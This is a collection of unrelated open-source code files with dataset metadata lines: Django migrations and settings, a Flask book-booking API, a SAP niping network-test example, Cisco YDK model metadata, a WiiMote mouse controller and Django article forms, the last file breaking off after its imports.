# Generated by Django 1.11.4 on 2017-09-20 03:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0014_auto_20170624_0048'),
]
operations = [
migrations.AddField(
model_name='subscription',
name='paid',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='pago'),
),
migrations.AlterField(
model_name='column',
name='subscription_name',
field=models.CharField(choices=[('name', 'name'), ('email', 'email'), ('name_for_bib_number', 'name_for_bib_number'), ('gender', 'gender'), ('date_of_birth', 'date_of_birth'), ('city', 'city'), ('team', 'team'), ('shirt_size', 'shirt_size'), ('modality', 'modality'), ('ignore', 'ignore'), ('paid', 'paid')], max_length=20, verbose_name='coluna'),
),
migrations.AlterField(
model_name='modality',
name='modality',
field=models.CharField(choices=[('1', '1km'), ('2', '2km'), ('3', '3km'), ('4', '4km'), ('5', '5km'), ('6', '6km'), ('7', '7km'), ('8', '8km'), ('9', '9km'), ('10', '10km'), ('C', 'Caminhada'), ('I', 'Infantil'), ('J', 'Juvenil'), ('K', 'Kangoo'), ('Q', 'Quarteto')], max_length=2, verbose_name='modalidade'),
),
migrations.AlterField(
model_name='subscription',
name='modality',
field=models.CharField(choices=[('1', '1km'), ('2', '2km'), ('3', '3km'), ('4', '4km'), ('5', '5km'), ('6', '6km'), ('7', '7km'), ('8', '8km'), ('9', '9km'), ('10', '10km'), ('C', 'Caminhada'), ('I', 'Infantil'), ('J', 'Juvenil'), ('K', 'Kangoo'), ('Q', 'Quarteto')], max_length=2, verbose_name='modalidade'),
),
]
| gpl-3.0 | 3,345,637,479,954,481,700 | 51.228571 | 359 | 0.520788 | false | 3.184669 | false | false | false |
JoshAshby/Fla.gr | app/controllers/flags/delete.py | 1 | 1960 | #!/usr/bin/env python
"""
fla.gr controller for deleting flags
For more information, see: https://github.com/JoshAshby/
http://xkcd.com/353/
Josh Ashby
2013
http://joshashby.com
[email protected]
"""
from seshat.route import autoRoute
from utils.baseHTMLObject import baseHTMLObject
from views.flags.flagDelTmpl import flagDelTmpl
import models.couch.flag.flagModel as fm
import models.couch.flag.collections.userPublicFlagsCollection as pubfc
import models.couch.flag.collections.userFlagsCollection as fc
import utils.search.searchUtils as su
@autoRoute()
class flagsDelete(baseHTMLObject):
_title = "delete flag"
__login__ = True
def GET(self):
"""
"""
flagid = self.env["members"][0]
flag = fm.flagORM.getByID(flagid)
if flag.userID != self.session.id:
self.session.pushAlert("You can't delete a flag you don't own!", "Can't do that!", "error")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
return
view = flagDelTmpl(searchList=[self.tmplSearchList])
view.flag = flag
return view
def POST(self):
flagid = self.env["members"][0]
flag = fm.flagORM.getByID(flagid)
if flag.userID != self.session.id:
self.session.pushAlert("You can't delete a flag you don't own!", "Can't do that!", "error")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
return
pubFlags = pubfc.userPublicFlagsCollection(self.session.id)
privFlags = fc.userFlagsCollection(self.session.id)
if flag.visibility:
pubFlags.delObject(flag.id)
privFlags.delObject(flag.id)
flag.delete()
su.updateSearch()
self.session.pushAlert("Flag `%s` deleted" % flag.title, "Bye!", "warning")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
| mit | -938,320,228,937,135,100 | 24.454545 | 103 | 0.62449 | false | 3.557169 | false | false | false |
CoreSecurity/pysap | examples/router_niping.py | 1 | 7348 | #!/usr/bin/env python2
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
#
# The library was designed and developed by Martin Gallo from
# the SecureAuth's Innovation Labs team.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# ==============
# Standard imports
import logging
from datetime import datetime
from argparse import ArgumentParser
from socket import socket, SHUT_RDWR, error as SocketError
# External imports
from scapy.packet import Raw
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPNI import SAPNIStreamSocket
from pysap.SAPRouter import SAPRoutedStreamSocket
# Set the verbosity to 0
conf.verb = 0
# Command line options parser
def parse_options():
description = "This script is an example implementation of SAP's niping utility."
usage = "%(prog)s [options] [mode] -H <remote host>"
parser = ArgumentParser(usage=usage, description=description, epilog=pysap.epilog)
mode = parser.add_argument_group("Running mode")
mode.add_argument("-s", "--start-server", dest="server", action="store_true",
help="Start server")
mode.add_argument("-c", "--start-client", dest="client", action="store_true",
help="Start client")
target = parser.add_argument_group("Target")
target.add_argument("-H", "--host", dest="host", help="Host")
target.add_argument("-S", "--port", dest="port", type=int, default=3298,
help="Port [%(default)d]")
target.add_argument("--route-string", dest="route_string",
help="Route string for connecting through a SAP Router")
misc = parser.add_argument_group("Misc options")
misc.add_argument("-v", "--verbose", dest="verbose", action="store_true", help="Verbose output")
misc.add_argument("-B", "--buffer-size", dest="buffer_size", type=int, default=1000,
help="Size of data-buffer [%(default)d]")
misc.add_argument("-L", "--loops", dest="loops", type=int, default=10,
help="Number of loops [%(default)d]")
options = parser.parse_args()
if not options.server and not options.client:
parser.error("Running mode is required")
if options.client and not (options.host or options.route_string):
parser.error("Remote host is required for starting a client")
return options
def client_mode(options):
""""Implements the niping client running mode
:param options: option set from the command line
:type options: Values
"""
times = []
p = Raw("EYECATCHER" + "\x00" * (options.buffer_size - 10))
try:
# Establish the connection
conn = SAPRoutedStreamSocket.get_nisocket(options.host,
options.port,
options.route_string)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("connect to server o.k.")
# Send the messages
for i in range(options.loops):
# Send the packet and grab the response
start_time = datetime.now()
r = conn.sr(p)
end_time = datetime.now()
# Check the response
if str(r.payload) != str(p):
logging.info("[-] Response on message {} differs".format(i))
# Calculate and record the elapsed time
times.append(end_time - start_time)
# Close the connection properly
conn.send(Raw())
conn.close()
except SocketError:
logging.error("[*] Connection error")
except KeyboardInterrupt:
logging.error("[*] Cancelled by the user")
if times:
logging.info("")
logging.info(datetime.today().ctime())
logging.info("send and receive {} messages (len {})".format(len(times), options.buffer_size))
# Calculate the stats
times = [x.total_seconds() * 1000 for x in times]
times_min = min(times)
times_max = max(times)
times_avg = float(sum(times)) / max(len(times), 1)
times_tr = float(options.buffer_size * len(times)) / float(sum(times))
times2 = [x for x in times if x not in [times_min, times_max]]
times2_avg = float(sum(times2)) / max(len(times2), 1)
times2_tr = float(options.buffer_size * len(times2)) / float(sum(times2))
# Print the stats
logging.info("")
logging.info("------- times -----")
logging.info("avg {:8.3f} ms".format(times_avg))
logging.info("max {:8.3f} ms".format(times_max))
logging.info("min {:8.3f} ms".format(times_min))
logging.info("tr {:8.3f} kB/s".format(times_tr))
logging.info("excluding max and min:")
logging.info("av2 {:8.3f} ms".format(times2_avg))
logging.info("tr2 {:8.3f} kB/s".format(times2_tr))
logging.info("")
def server_mode(options):
""""Implements the niping server running mode
:param options: option set from the command line
:type options: Values
"""
if not options.host:
options.host = "0.0.0.0"
sock = socket()
try:
sock.bind((options.host, options.port))
sock.listen(0)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("ready for connect from client ...")
while True:
sc, sockname = sock.accept()
client = SAPNIStreamSocket(sc)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("connect from host '{}', client hdl {} o.k.".format(sockname[0], client.fileno()))
try:
while True:
r = client.recv()
client.send(r.payload)
except SocketError:
pass
finally:
logging.info("")
logging.info(datetime.today().ctime())
logging.info("client hdl {} disconnected ...".format(client.fileno()))
except SocketError:
logging.error("[*] Connection error")
except KeyboardInterrupt:
logging.error("[*] Cancelled by the user")
finally:
sock.shutdown(SHUT_RDWR)
sock.close()
# Main function
def main():
options = parse_options()
level = logging.INFO
if options.verbose:
level = logging.DEBUG
logging.basicConfig(level=level, format='%(message)s')
if options.buffer_size < 10:
logging.info("[*] Using minimum buffer size of 10 bytes")
options.buffer_size = 10
# Client running mode
if options.client:
client_mode(options)
# Server running mode
elif options.server:
server_mode(options)
if __name__ == "__main__":
main()
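# Example invocations (a sketch; assumes this file is saved as niping.py,
# and the host value below is a placeholder):
#
#   python niping.py -s                      # start the echo server on port 3298
#   python niping.py -c -H 10.0.0.1 -L 100   # ping a remote host with 100 loops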
| gpl-2.0 | -3,101,596,490,320,406,000 | 31.950673 | 107 | 0.605607 | false | 4.010917 | false | false | false |
111pontes/ydk-py | cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_lpts_ifib_oper.py | 1 | 12672 |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION, ANYXML_CLASS
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'LptsIfib.Nodes.Node.SliceIds.SliceId.Entry' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds.SliceId.Entry',
False,
[
_MetaInfoClassMember('entry', ATTRIBUTE, 'int' , None, None,
[('-2147483648', '2147483647')], [],
''' Single Pre-ifib entry
''',
'entry',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('accepts', ATTRIBUTE, 'int' , None, None,
[('0', '18446744073709551615')], [],
''' Packets matched to accept
''',
'accepts',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('deliver-list-long', ATTRIBUTE, 'str' , None, None,
[], [],
''' Deliver List Long Format
''',
'deliver_list_long',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('deliver-list-short', ATTRIBUTE, 'str' , None, None,
[], [],
''' Deliver List Short Format
''',
'deliver_list_short',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-addr', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination IP Address
''',
'destination_addr',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-type', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination Key Type
''',
'destination_type',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-value', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination Port/ICMP Type/IGMP Type
''',
'destination_value',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('drops', ATTRIBUTE, 'int' , None, None,
[('0', '18446744073709551615')], [],
''' Packets matched to drop
''',
'drops',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('flow-type', ATTRIBUTE, 'str' , None, None,
[], [],
''' Flow type
''',
'flow_type',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('ifib-program-time', ATTRIBUTE, 'str' , None, None,
[], [],
''' ifib program time in netio
''',
'ifib_program_time',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('intf-handle', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Interface Handle
''',
'intf_handle',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('intf-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' Interface Name
''',
'intf_name',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('is-fgid', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Is FGID or not
''',
'is_fgid',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('is-syn', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Is SYN
''',
'is_syn',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('l3protocol', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Layer 3 Protocol
''',
'l3protocol',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('l4protocol', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Layer 4 Protocol
''',
'l4protocol',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('listener-tag', ATTRIBUTE, 'str' , None, None,
[], [],
''' Listener Tag
''',
'listener_tag',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('local-flag', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Local Flag
''',
'local_flag',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('min-ttl', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Minimum TTL
''',
'min_ttl',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('opcode', ATTRIBUTE, 'str' , None, None,
[], [],
''' Opcode
''',
'opcode',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('pending-ifibq-delay', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' pending ifib queue delay
''',
'pending_ifibq_delay',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('sl-ifibq-delay', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' sl_ifibq delay
''',
'sl_ifibq_delay',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('source-addr', ATTRIBUTE, 'str' , None, None,
[], [],
''' Source IP Address
''',
'source_addr',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('source-port', ATTRIBUTE, 'str' , None, None,
[], [],
''' Source port
''',
'source_port',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('vid', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' VRF ID
''',
'vid',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('vrf-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' VRF Name
''',
'vrf_name',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'entry',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node.SliceIds.SliceId' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds.SliceId',
False,
[
_MetaInfoClassMember('slice-name', ATTRIBUTE, 'str' , None, None,
[], [b'[\\w\\-\\.:,_@#%$\\+=\\|;]+'],
''' Type value
''',
'slice_name',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('entry', REFERENCE_LIST, 'Entry' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds.SliceId.Entry',
[], [],
''' Data for single pre-ifib entry
''',
'entry',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'slice-id',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node.SliceIds' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds',
False,
[
_MetaInfoClassMember('slice-id', REFERENCE_LIST, 'SliceId' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds.SliceId',
[], [],
''' slice types
''',
'slice_id',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'slice-ids',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], [b'([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' The node name
''',
'node_name',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('slice-ids', REFERENCE_CLASS, 'SliceIds' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds',
[], [],
''' Slice specific
''',
'slice_ids',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'node',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes',
False,
[
_MetaInfoClassMember('node', REFERENCE_LIST, 'Node' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node',
[], [],
''' Per node slice
''',
'node',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'nodes',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib' : {
'meta_info' : _MetaInfoClass('LptsIfib',
False,
[
_MetaInfoClassMember('nodes', REFERENCE_CLASS, 'Nodes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes',
[], [],
''' Node ifib database
''',
'nodes',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'lpts-ifib',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
}
_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId.Entry']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId']['meta_info']
_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node.SliceIds']['meta_info']
_meta_table['LptsIfib.Nodes.Node.SliceIds']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node']['meta_info']
_meta_table['LptsIfib.Nodes.Node']['meta_info'].parent =_meta_table['LptsIfib.Nodes']['meta_info']
_meta_table['LptsIfib.Nodes']['meta_info'].parent =_meta_table['LptsIfib']['meta_info']
| apache-2.0 | 5,088,838,015,105,870,000 | 43.463158 | 197 | 0.445786 | false | 3.741364 | false | false | false |
beatrizjesus/my-first-blog | mysite/settings.py | 1 | 2723 | #coding: utf-8
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%=1d%f!jg072%x^01%j6-*_q@a431ep$%o0@59zux)ns3w$ghu'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| mit | 6,906,513,009,619,772,000 | 24.688679 | 71 | 0.689313 | false | 3.416562 | false | false | false |
Narcolapser/Little-Mote | wm.py | 1 | 3553 | import cwiid
import time
import uinput
class WiiMote (object):
def __init__(self,addr=None):
#save the wiimote address for later reference
self.addr = addr
		#connect to the wiimote (hold buttons 1+2 on the wiimote so it is
		#discoverable; keep retrying until the connection succeeds)
		self.mote = None
		while self.mote is None:
			try:
				self.mote = cwiid.Wiimote()
			except RuntimeError as e:
				print "failed to connect to wiimote."
#for debugging, turn 1 LED on.
self.mote.led = 1
self.ledNum = 1
#prepare the callback list:
self.calls = {
'2':None,
'1':None,
'b':None,
'a':None,
'minus':None,
'home':None,
'left':None,
'right':None,
'down':None,
'up':None,
'plus':None
}
#prep the reactor variable.
self.react = False
#turn on the wiimote's reporting for buttons
self.mote.rpt_mode = cwiid.RPT_BTN
#initialize the mouse controller
self.mouse = uinput.Device([
uinput.BTN_LEFT,
uinput.BTN_RIGHT,
uinput.REL_X,
uinput.REL_Y
])
self.lstate = 0
self.rstate = 0
def start(self):
'''
Start the reactor loop that listens for WiiMote events so the appropriate call back
can be called.
'''
self.react = True
while self.react:
time.sleep(0.01)
bstate = self.mote.state['buttons']
			if bstate % 2 and self.calls['2'] is not None:
				self.calls['2'](self)
			if bstate / 2 % 2 and self.calls['1'] is not None:
				self.calls['1'](self)
# if bstate / 4 % 2 and self.calls['b'] is not None:
# self.calls['b'](wm)
# if bstate / 8 % 2 and self.calls['a'] is not None:
# self.calls['a'](wm)
if bstate / 16 % 2 and self.calls['minus'] is not None:
self.calls['minus']()
if bstate / 128 % 2 and self.calls['home'] is not None:
self.calls['home']()
if bstate / 256 % 2 and self.calls['left'] is not None:
self.calls['left']()
if bstate / 512 % 2 and self.calls['right'] is not None:
self.calls['right']()
if bstate / 1024 % 2 and self.calls['down'] is not None:
self.calls['down']()
if bstate / 2048 % 2 and self.calls['up'] is not None:
self.calls['up']()
if bstate / 4096 % 2 and self.calls['plus'] is not None:
self.calls['plus']()
			leftClick(self)
			rightClick(self)
	def stop(self):
		'''
		stops the reactor loop.
		'''
		self.react = False
	def release(self):
		'''
		releases the wiimote, which should effectively turn it off.
		'''
		self.stop()
		self.mote.close()
def testOut(wm):
	print wm.mote.state['buttons']
def callmeMaybe():
print "I was called!"
def countUp():
wm.ledNum = (wm.ledNum + 0.1) % 16
if wm.ledNum < 1:
wm.ledNum = 1
wm.mote.led = int(wm.ledNum)
def countDown():
wm.ledNum = (wm.ledNum - 0.1) % 16
if wm.ledNum < 1:
wm.ledNum = 16
wm.mote.led = int(wm.ledNum)
def mousetickDown():
mousetick(0,int(wm.ledNum))
def mousetickUp():
mousetick(0,int(-1*wm.ledNum))
def mousetickLeft():
mousetick(int(-1*wm.ledNum),0)
def mousetickRight():
mousetick(int(wm.ledNum),0)
def mousetick(x,y):
wm.mouse.emit(uinput.REL_X,x)
wm.mouse.emit(uinput.REL_Y,y)
def leftClick(wm):
state = wm.mote.state['buttons'] / 8 % 2
if state != wm.lstate:
wm.mouse.emit(uinput.BTN_LEFT,state)
# wm.mouse.emit(uinput.BTN_LEFT,1)
wm.lstate = state
def rightClick(wm):
	state = wm.mote.state['buttons'] / 4 % 2
	if state != wm.rstate:
		wm.mouse.emit(uinput.BTN_RIGHT,state)
		wm.rstate = state
if __name__ == "__main__":
wm = WiiMote()
wm.calls['2'] = testOut
wm.calls['1'] = testOut
wm.calls['b'] = leftClick
wm.calls['a'] = rightClick
wm.calls['minus'] = countDown
wm.calls['home'] = callmeMaybe
wm.calls['left'] = mousetickLeft
wm.calls['right'] = mousetickRight
wm.calls['down'] = mousetickDown
wm.calls['up'] = mousetickUp
wm.calls['plus'] = countUp
wm.start()
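# Notes on running this script (assumptions, not verified here): cwiid
# pairs with the WiiMote when buttons 1 and 2 are held down to make it
# discoverable, and opening /dev/uinput for the virtual mouse typically
# requires root privileges or a matching udev rule.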
| apache-2.0 | 467,865,063,283,979,100 | 21.630573 | 85 | 0.630172 | false | 2.584 | false | false | false |
boar/boar | boar/articles/forms.py | 1 | 2132 | import datetime
import time
from django import forms
from django.contrib.admin.widgets import FilteredSelectMultiple
from boar.articles.models import Article, Tag
from boar.articles.widgets import MarkItUpWidget
class ArticleAdminModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
# Make TagManager act like a ManyToManyField
if 'initial' not in kwargs:
kwargs['initial'] = {}
if kwargs.get('instance', None):
opts = self._meta.model._meta
for f in sorted(opts.fields + opts.many_to_many):
if f.name == 'tags':
if kwargs['instance'].pk is None:
kwargs['initial'][f.name] = []
else:
kwargs['initial'][f.name] = [obj.tag.pk for obj in f.value_from_object(kwargs['instance'])]
super(ArticleAdminModelForm, self).__init__(*args, **kwargs)
if 'pub_date' in self.initial and isinstance(self.initial['pub_date'], basestring):
self.initial['pub_date'] = datetime.datetime(*time.strptime(self.initial['pub_date'], '%Y-%m-%d %H:%M:%S')[:6])
summary = forms.CharField(
required=False,
widget=forms.Textarea(attrs={'id': 'summary', 'rows': '5', 'cols': '80'}),
help_text=Article._meta.get_field('summary').help_text
)
body = forms.CharField(
widget=MarkItUpWidget(),
help_text=Article._meta.get_field('body').help_text
)
tags = forms.ModelMultipleChoiceField(
queryset=Tag.objects.all(),
widget=FilteredSelectMultiple('Tags', False),
required=False,
help_text=Article._meta.get_field('tags').help_text
)
class Meta:
model = Article
class ArticleArchiveForm(forms.Form):
def __init__(self, *args, **kwargs):
qs = kwargs['qs']
del(kwargs['qs'])
super(ArticleArchiveForm, self).__init__(*args, **kwargs)
self.fields['month'].choices = [(d.strftime('%Y-%b').lower(), d.strftime('%B %Y')) for d in qs.dates('pub_date', 'month')]
month = forms.ChoiceField(choices=[])
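# Example instantiation of the archive form (a sketch; the request object
# and queryset shown are assumptions, not part of this module):
#
#   form = ArticleArchiveForm(request.GET or None, qs=Article.objects.all())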
| bsd-3-clause | 5,179,197,279,134,125,000 | 37.071429 | 130 | 0.596154 | false | 3.911927 | false | false | false |
gekorob/liebraryrest | liebraryrest/api/books.py | 1 | 2344 | import json
from flask import Blueprint, Response, request
from liebraryrest.models import Book, User, Booking
blueprint = Blueprint('books', __name__, url_prefix='/api/books')
@blueprint.route('')
def book_list():
return Response(json.dumps(Book.serialize_list(Book.query.all())),
mimetype='application/json',
status=200)
@blueprint.route('/<book_isbn>')
def book_show(book_isbn):
book = Book.get_by_isbn(book_isbn)
if book is not None:
return Response(book.to_json(),
mimetype='application/json',
status=200)
return Response(json.dumps("No book found with isbn {}".format(book_isbn)),
mimetype='application/json',
status=404)
@blueprint.route('/<book_isbn>/bookings', methods=['POST'])
def booking_on_a_book(book_isbn):
try:
request_body = json.loads(request.data.decode('UTF-8'))
user_id = request_body['user_id']
except (ValueError, KeyError):
return Response(
json.dumps("Invalid JSON or missing user_id param"),
mimetype='application/json',
status=400)
book = Book.get_by_isbn(book_isbn)
user = User.get_by_id(user_id)
if (book is not None) and (user is not None):
booking = Booking.get_by_isbn_and_user_id(book.isbn, user.id)
if booking is not None:
return Response(
json.dumps("This book {} is already on the booking list of user {}"
.format(book.isbn, user.id)),
mimetype='application/json',
status=400
)
if book.is_available():
book.quantity -= 1
book.save()
booking = Booking(book, user)
booking.save()
return Response(booking.to_json(),
mimetype='application/json',
status=201)
return Response(json.dumps("Book {} is not available for booking".format(book_isbn, user_id)),
mimetype='application/json',
status=400)
return Response(json.dumps("Unable to find Book: {} or user: {}".format(book_isbn, user_id)),
mimetype='application/json',
status=404)
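# Example requests against a local development server (the host, port, ISBN
# and user id below are placeholders):
#
#   curl http://localhost:5000/api/books
#   curl http://localhost:5000/api/books/9780132350884
#   curl -X POST http://localhost:5000/api/books/9780132350884/bookings \
#        -d '{"user_id": 1}'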
| bsd-3-clause | -2,606,883,758,395,606,500 | 34.515152 | 102 | 0.553754 | false | 4.055363 | false | false | false |
CenterForOpenScience/lookit-api | accounts/migrations/0049_two_factor_auth_cleanup.py | 1 | 2863 | # Generated by Django 3.0.7 on 2020-08-04 22:04
from random import choices, randint
from string import ascii_letters, digits, punctuation
from django.contrib.auth.hashers import UNUSABLE_PASSWORD_PREFIX, make_password
from django.db import migrations
# Just want to highlight that we are distinguishing between these two.
ALLAUTH_ACCOUNT_APP = "account"
LOOKIT_ACCOUNTS_APP = "accounts"
